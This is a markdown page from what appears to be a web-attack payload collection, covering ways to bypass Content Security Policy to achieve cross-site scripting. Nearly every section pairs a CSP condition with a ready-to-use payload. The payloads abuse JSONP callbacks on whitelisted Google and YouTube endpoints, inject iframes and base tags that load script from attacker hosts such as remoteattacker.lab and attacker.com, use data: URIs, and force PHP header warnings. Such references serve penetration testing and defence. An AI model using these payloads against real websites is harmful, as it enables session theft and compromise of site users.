XSS Injection/4 - CSP Bypass.md
A Content Security Policy (CSP) is a security feature that helps prevent cross-site scripting (XSS), data injection attacks, and other code-injection vulnerabilities in web applications. It works by specifying which sources of content (like scripts, styles, images, etc.) are allowed to load and execute on a webpage.
Requirements:
script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';Payload:
Use a callback function from a whitelisted source listed in the CSP.
//google.com/complete/search?client=chrome&jsonp=alert(1);https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();https://www.youtube.com/oembed?callback=alert;<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
Requirements:
Content-Security-Policy: default-src 'self' 'unsafe-inline';,Payload:
http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;
script=document.createElement('script');
script.src='//remoteattacker.lab/csp.js';
window.frames[0].document.head.appendChild(script);
Source: lab.wallarm.com
Requirements:
inline or evalPayload:
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
Source: Rhynorater
Requirements:
script-src selfPayload:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
Source: @akita_zen
Requirements:
script-src 'self' data: as warned about in the official mozilla documentation.Payload:
<script src="data:,alert(1)">/</script>
Source: @404death
Requirements:
script-src https://google.com 'unsafe-inline';Payload:
"/><script>alert(1);</script>
Requirements:
script-src 'nonce-RANDOM_NONCE'<script src='/PATH.js'></script>Payload:
Inject a base tag.
<base href=http://www.attacker.com>
Host your custom js file at the same path that one of the website's script.
http://www.attacker.com/PATH.js
Requirements:
header() functionPayload:
In default php:apache image configuration, PHP cannot modify headers when the response's data has already been written. This event occurs when a warning is raised by PHP engine.
Here are several ways to generate a warning:
If the Warning are configured to be displayed you should get these:
PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0Cannot modify header information - headers already sent in /var/www/html/index.php on line 2GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a
Source: @pilvar222